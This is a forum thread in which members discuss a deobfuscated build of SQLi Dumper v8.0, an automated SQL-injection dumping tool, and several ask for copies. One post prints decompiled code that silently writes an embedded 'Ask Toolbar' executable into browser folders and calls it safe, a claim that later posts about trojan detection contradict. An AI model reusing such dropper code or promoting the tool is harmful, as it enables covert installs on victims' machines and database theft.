Exposed source of SQLi Dumper v8.0

Discussion in 'General Discussion' started by Microsoft, Jun 7, 2015.

Thread Status:
Not open for further replies.
  1. Microsoft

    Microsoft Well-Known Member Legacy

    Messages:
    2,361
    Likes:
    2,510
    Ratio:
    1.44
    I've managed to deobfuscate the SQLi Dumper 8.0
    Someone with the right skills to find any malware inside it shoot me a PM for the download.
     
    Dungvtp86 likes this.
  2. Bangerz

    Bangerz Basic Member

    Messages:
    1,111
    Likes:
    339
    Ratio:
    0.26
    SQLi 8.0 WOW.
     
  3. ProHex

    ProHex Banned

    Messages:
    12
    Likes:
    7
    Ratio:
    1
    Just checked it (thanks by the way!) and analyzed it.

    Everything is pretty much safe and clean.

    Thats the only part that made me look out, but it seems it just integrates the ask toolbar for the search function:
    Code:
    Select All
    [MethodImpl(MethodImplOptions.NoOptimization)] private void Form1_Load(object sender, EventArgs e) { int num2; try { int num3; Label_0000: ProjectData.ClearProjectError(); int num = 1; Label_0008: num3 = 2; string path = @"C:\Program Files (x86)\Google\Chrome\Application\Ask Toolbar Chrome.exe"; Label_0011: num3 = 3; string str6 = @"C:\Program Files (x86)\Google\Chrome\Application\Ask Toolbar Chrome.lnk"; Label_001B: num3 = 4; string directory = @"C:\Program Files (x86)\Google\Chrome\Application"; Label_0025: num3 = 5; string str = @"C:\Program Files\Google\Chrome\Application\Ask Toolbar Chrome.exe"; Label_002E: num3 = 6; string str3 = @"C:\Program Files\Google\Chrome\Application\Ask Toolbar Chrome.lnk"; Label_0037: num3 = 7; string str2 = @"C:\Program Files\Google\Chrome\Application"; Label_0040: num3 = 8; string str10 = @"C:\Program Files (x86)\Mozilla Firefox\Ask Toolbar Firefox.exe"; Label_004A: num3 = 9; string str12 = @"C:\Program Files (x86)\Mozilla Firefox\Ask Toolbar Firefox.lnk"; Label_0055: num3 = 10; string str11 = @"C:\Program Files (x86)\Mozilla Firefox"; Label_0060: num3 = 11; string str7 = @"C:\Program Files\Mozilla Firefox\Ask Toolbar Firefox.exe"; Label_006B: num3 = 12; string str9 = @"C:\Program Files\Mozilla Firefox\Ask Toolbar Firefox.lnk"; Label_0076: num3 = 13; string str8 = @"C:\Program Files\Mozilla Firefox"; Label_0081: num3 = 14; if (!MyProject.Computer.FileSystem.DirectoryExists(directory)) { goto Label_02BB; } Label_009B: num3 = 15; File.WriteAllBytes(path, SQLi_Dumper_v._8._0.My.Resources.Resources.Ask); Label_00AA: num3 = 0x10; object objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell", "")); Label_00C4: num3 = 0x11; objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell", "")); Label_00DE: num3 = 0x12; object[] arguments = new object[] { str6 }; bool[] copyBack = new bool[] { true }; if (copyBack[0]) { str6 = (string) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(arguments[0]), typeof(string)); } object instance = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, "CreateShortcut", arguments, null, null, copyBack)); Label_0140: num3 = 0x13; object[] objArray3 = new object[1]; object[] objArray = new object[] { path }; copyBack = new bool[] { true }; if (copyBack[0]) { path = (string) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray[0]), typeof(string)); } objArray3[0] = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, "ExpandEnvironmentStrings", objArray, null, null, copyBack)); NewLateBinding.LateSet(instance, null, "TargetPath", objArray3, null, null); Label_01BB: num3 = 20; objArray = new object[1]; arguments = new object[] { path }; copyBack = new bool[] { true }; if (copyBack[0]) { path = (string) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(arguments[0]), typeof(string)); }
     
    Dungvtp86, Truculent and Microsoft like this.
  4. Onlykl

    Onlykl Member

    Messages:
    363
    Likes:
    108
    Ratio:
    0.11
    Send it over Microsoft please?
     
  5. seNs

    seNs Active Member

    Messages:
    970
    Likes:
    664
    Ratio:
    1.06
    may i get it aswell please ? and does google work on it cus on v7 its not anymore :(
     
  6. Caskey

    Caskey New Member

    Messages:
    230
    Likes:
    118
    Ratio:
    0.49
    seNs likes this.
  7. seNs

    seNs Active Member

    Messages:
    970
    Likes:
    664
    Ratio:
    1.06
  8. Caskey

    Caskey New Member

    Messages:
    230
    Likes:
    118
    Ratio:
    0.49
    Ya, only thing I really notice different is that its detected to contain a trojan.

    [​IMG]
     
  9. Microsoft

    Microsoft Well-Known Member Legacy

    Messages:
    2,361
    Likes:
    2,510
    Ratio:
    1.44
    Let's all just forget about this version 8.
    It appears to be infected like many say.
    Version 7 contains Google but its patched somehow, same thing counts for v8 altho v8 is a trojan..
     
Thread Status:
Not open for further replies.

Share This Page